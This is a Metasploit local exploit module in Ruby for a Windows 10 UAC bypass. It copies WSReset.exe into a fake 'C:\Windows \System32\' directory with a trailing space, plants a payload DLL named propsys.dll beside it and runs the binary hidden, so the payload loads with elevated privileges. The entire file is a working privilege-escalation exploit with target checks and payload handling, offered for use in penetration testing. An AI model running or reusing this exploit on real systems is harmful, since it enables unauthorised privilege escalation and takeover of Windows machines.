##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)',
        'Description' => %q{
          This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool
          is run with the "autoElevate" property set to true, however it can be moved to
          a new Windows directory containing a space (C:\Windows \System32\) where, upon
          execution, it will load our payload dll (propsys.dll).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'ACTIVELabs', # discovery
          'sailay1996', # poc
          'timwr',      # metasploit module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [[ 'Automatic', {} ]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'WfsDelay' => 15
        },
        'DisclosureDate' => '2019-08-22',
        'Notes' => {
          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
        },
        'References' => [
          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
          ['URL', 'https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e'],
        ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_file_copy
              stdapi_fs_mkdir
              stdapi_sys_process_execute
            ]
          }
        }
      )
    )
  end

  def check
    version = get_version_info
    if version.build_number > Msf::WindowsVersion::Win10_InitialRelease && !version.windows_server? && exists?('C:\\Windows\\System32\\WSReset.exe')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    end

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target')
    end

    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    exploit_win_dir = 'C:\\Windows \\'
    exploit_dir = 'C:\\Windows \\System32\\'
    exploit_file = exploit_dir + 'WSReset.exe'
    unless exists? exploit_win_dir
      print_status("Creating directory '#{exploit_win_dir}'...")
      session.fs.dir.mkdir(exploit_win_dir)
    end
    unless exists? exploit_dir
      print_status("Creating directory '#{exploit_dir}'...")
      session.fs.dir.mkdir(exploit_dir)
    end
    unless exists? exploit_file
      session.fs.file.copy('C:\\Windows\\System32\\WSReset.exe', exploit_file)
    end

    payload_dll = 'C:\\Windows \\System32\\propsys.dll'
    print_status("Creating payload '#{payload_dll}'...")
    payload = generate_payload_dll
    write_file(payload_dll, payload)
    print_status('Executing WSReset.exe...')
    begin
      session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, { 'Hidden' => true })
    rescue ::Exception => e
      print_error(e.to_s)
    end
    print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!")
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    elsif admin_group
      print_good('Part of Administrators group! Continuing...')
    else
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end